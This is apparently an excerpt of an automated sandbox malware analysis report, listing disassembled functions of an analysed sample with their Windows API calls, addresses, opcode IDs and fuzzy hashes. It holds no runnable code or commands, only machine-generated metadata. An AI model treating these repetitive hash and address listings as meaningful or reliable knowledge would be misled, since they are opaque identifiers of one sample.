                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c6410a5ee2d62a272db51bcd8b8a7da3192337e716e9c8182f8e824980ba0804
                                                                                                                                                      • Instruction ID: 92a132e9dda57f7a85f324cfa58dceb2437424ba8245328426f7f74923188f5f
                                                                                                                                                      • Opcode Fuzzy Hash: c6410a5ee2d62a272db51bcd8b8a7da3192337e716e9c8182f8e824980ba0804
                                                                                                                                                      • Instruction Fuzzy Hash: 0B51E6B9A00104AFDB10CF68CC64A697FB1FB85365F19816AEC089B391C731ED46CB90
                                                                                                                                                      APIs
                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0059FBE3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                      • Opcode ID: f99188e240df1ac0d1d2ce94b233db9ddb0ec0c36e48d12b7e01b8df412a46ac
                                                                                                                                                      • Instruction ID: d89824f84e14a87df566d7f592d4a40bb80a07f26fc5d9961bf5ef928347f018
                                                                                                                                                      • Opcode Fuzzy Hash: f99188e240df1ac0d1d2ce94b233db9ddb0ec0c36e48d12b7e01b8df412a46ac
                                                                                                                                                      • Instruction Fuzzy Hash: 2C4182B6600209AFDF15AF64C8859AE7BB8FF84314B15893EE916D7241EB70DE44CB50
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                      • Instruction ID: 55ef4789b4fdbb6b295b62391749561a88208a8b226b7eb2bdbe2f4bca2236dc
                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                      • Instruction Fuzzy Hash: DC31EA70600105DFCB18DF58C4A8A69FBA1FB49301BA496A6E80ACB6E5D731EDC5CBD0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 005A8EBE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePathPrivateProfileString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1991638491-0
                                                                                                                                                      • Opcode ID: fc9798cc38cfe2de7ec33a0d0cb592fe570f9feff281d402ba1e1d1aa186ac22
                                                                                                                                                      • Instruction ID: bcee142f5ab914637222eab1abfa8c6106da6517faac36ba7357e8a828bccf68
                                                                                                                                                      • Opcode Fuzzy Hash: fc9798cc38cfe2de7ec33a0d0cb592fe570f9feff281d402ba1e1d1aa186ac22
                                                                                                                                                      • Instruction Fuzzy Hash: AB213E35600A06AFCB04EB64C94ACAEBBB5FF89360F044054FA45AB3A1CB30FD45DB90
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00536332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053633E
                                                                                                                                                        • Part of subcall function 00536332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00536350
                                                                                                                                                        • Part of subcall function 00536332: FreeLibrary.KERNEL32(00000000,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536362
                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053639F
                                                                                                                                                        • Part of subcall function 005362FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536304
                                                                                                                                                        • Part of subcall function 005362FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00536316
                                                                                                                                                        • Part of subcall function 005362FB: FreeLibrary.KERNEL32(00000000,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536329
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                      • Opcode ID: 652da58bba4d420c8458d21032f04a2e195feadc5091c9d487705bac9bd065d5
                                                                                                                                                      • Instruction ID: b249d204eb5ac97e384933cab26fba684fc70f0a746d63791dc1b844cc3ba01d
                                                                                                                                                      • Opcode Fuzzy Hash: 652da58bba4d420c8458d21032f04a2e195feadc5091c9d487705bac9bd065d5
                                                                                                                                                      • Instruction Fuzzy Hash: C411E732600606BACF14BB64D80ABAD7FB5BF90711F20C83DF442AB1C1EEB49E459760
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                      • Opcode ID: 38829b5404620fc92e4271ecac1f18c986fad969fef861498453f388f49b272c
                                                                                                                                                      • Instruction ID: 33ea87dc520d2148855bcb6fae1ea8e0179845070b7ac02e7590f69c54763db7
                                                                                                                                                      • Opcode Fuzzy Hash: 38829b5404620fc92e4271ecac1f18c986fad969fef861498453f388f49b272c
                                                                                                                                                      • Instruction Fuzzy Hash: D211487190420AAFCB15DF58E9449AE7BF5FF48310F1041A9F809AB312DA31EA118BA4
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00536B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0053B0AC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 393155aedf3abf5177b2ed81f3a84c68291a6db804fb36bea375237451a4821f
                                                                                                                                                      • Instruction ID: 95860edacb1db705adba9be828b82c579d485a7dd0ab8c62f9377f48cbd46f6c
                                                                                                                                                      • Opcode Fuzzy Hash: 393155aedf3abf5177b2ed81f3a84c68291a6db804fb36bea375237451a4821f
                                                                                                                                                      • Instruction Fuzzy Hash: 66113A31200705DFE7258E15C488B67BBE9FF44354F14C82EEAAA8BA51C771A945CB60
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                                                                      • Instruction ID: 5217a1f07ec273566246854f998e0d6ff6ce13704263268045b352b78c640151
                                                                                                                                                      • Opcode Fuzzy Hash: e3bcfdf3ea30de5ad2fd104242f32a7f0da7ba7ac48dae96aa9490ba82f0e323
                                                                                                                                                      • Instruction Fuzzy Hash: 98F0F932500A2156C6362A66DC1A76A3F69BFC2376F140B17FC65931D1EFB0990A86A1
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00556A99,?,0000015D,?,?,?,?,005585D0,000000FF,00000000,?,?), ref: 00563BE2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: 8ca051971859c65ee350494415e174ae8995558f3cbe5f52f7867d1965bd05a2
                                                                                                                                                      • Instruction ID: fc921259344a07fb10d5d162150afedb9bfdcd43b33b87d5d40f2238a21d3cd6
                                                                                                                                                      • Opcode Fuzzy Hash: 8ca051971859c65ee350494415e174ae8995558f3cbe5f52f7867d1965bd05a2
                                                                                                                                                      • Instruction Fuzzy Hash: 95E0ED312046225BE7202A6A9C28F5A3E59FF817E0F1A0122AC06D70B0EB20DE04C2E0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7aa70d796b4b1842f663779d25329e82932f3fc59391145f8fa5e75d0c6f68c1
                                                                                                                                                      • Instruction ID: af4f649c998d6d4ad6ec87cc943a69828371474ec92cc9d65d08690160197606
                                                                                                                                                      • Opcode Fuzzy Hash: 7aa70d796b4b1842f663779d25329e82932f3fc59391145f8fa5e75d0c6f68c1
                                                                                                                                                      • Instruction Fuzzy Hash: 4BF0F271501B12DFCB349F64E494812BFE5BA1432A3248D7EE19B83620D772A844EB50
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                      • Opcode ID: 84f66146ea2e4c4f174f9dd55e81013bf2b925d685ac169795501b1627aff87c
                                                                                                                                                      • Instruction ID: 37441cdbe391dcdd33b2b5a0b5ff23b590ef7c1811ec934f08666dbb00849263
                                                                                                                                                      • Opcode Fuzzy Hash: 84f66146ea2e4c4f174f9dd55e81013bf2b925d685ac169795501b1627aff87c
                                                                                                                                                      • Instruction Fuzzy Hash: B1F0E571B04A419AD7206A74D819BE2BFE4BB10359F14881AD8C592181D7B154D8A762
                                                                                                                                                      APIs
                                                                                                                                                      • _free.LIBCMT ref: 0056512C
                                                                                                                                                        • Part of subcall function 00562D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4), ref: 00562D6E
                                                                                                                                                        • Part of subcall function 00562D58: GetLastError.KERNEL32(00601DC4,?,0056DB71,00601DC4,00000000,00601DC4,00000000,?,0056DB98,00601DC4,00000007,00601DC4,?,0056DF95,00601DC4,00601DC4), ref: 00562D80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1353095263-0
                                                                                                                                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                      • Instruction ID: 4d13f4aa37140f0f04d2f80d949efbbfc40f97ea7a7b9eb47fc962b077e7ee93
                                                                                                                                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                      • Instruction Fuzzy Hash: 85E092761507059F8721CF6CD800A82BBF4EF853607208629E8DDD7220D371E812CB40
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                      • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                                                                      • Instruction ID: 2b6574aa2fb2f4c299abf3191baceb1cd9dc9be5c9ba80a02b8b100a25ec9aba
                                                                                                                                                      • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                                                                                                                      • Instruction Fuzzy Hash: 62F0D47240020EBBDF05DF90C945A9E7B69FB04318F208489F9199A151D376DA21EBA1
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 176396367-0
                                                                                                                                                      • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                                                                      • Instruction ID: 711825c1d6579deada08a9c0f0d3c850040b91cbc2d8e0691ea168ba4db771dd
                                                                                                                                                      • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                                                                                                                      • Instruction Fuzzy Hash: CFD05E2274241135A669213D2D1FC7F491CDBC26A2B04143FFE02CA1A5E9444C4604A1
                                                                                                                                                      APIs
                                                                                                                                                      • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 0059E7A2
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: NamePathShort_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2021730007-0
                                                                                                                                                      • Opcode ID: bb6f6bcd354a241fe63491201c460f91784186a7d46707a01fa24f05037dfc7e
                                                                                                                                                      • Instruction ID: 76b382d243128ecad4a43bcb41907c51040815ba05e069ff4bc4e204e0cebd80
                                                                                                                                                      • Opcode Fuzzy Hash: bb6f6bcd354a241fe63491201c460f91784186a7d46707a01fa24f05037dfc7e
                                                                                                                                                      • Instruction Fuzzy Hash: 10E0CD765002255BCB1192589C09FEA77EDEFC8790F044070FC09D7248DD64DD8095A0
                                                                                                                                                      APIs
                                                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005339FD
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 541455249-0
                                                                                                                                                      • Opcode ID: 051635adfecbd523bdb361eced92868bcf7afacd3d15346a1aa980139d112071
                                                                                                                                                      • Instruction ID: 5c796aae1c32297517073328273357d0ccf5233ce65f3a08427de96f9baf9389
                                                                                                                                                      • Opcode Fuzzy Hash: 051635adfecbd523bdb361eced92868bcf7afacd3d15346a1aa980139d112071
                                                                                                                                                      • Instruction Fuzzy Hash: B8E0CD765002255BCB1192589C09FEA77EDEFC8790F044071FC09D7248DD64ED80D690
                                                                                                                                                      APIs
                                                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0059E76C
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: FolderPath_wcslen
• String ID:
• API String ID: 2987691875-0
APIs
• CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0059D9DC,?,?), ref: 0059DA72
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
APIs
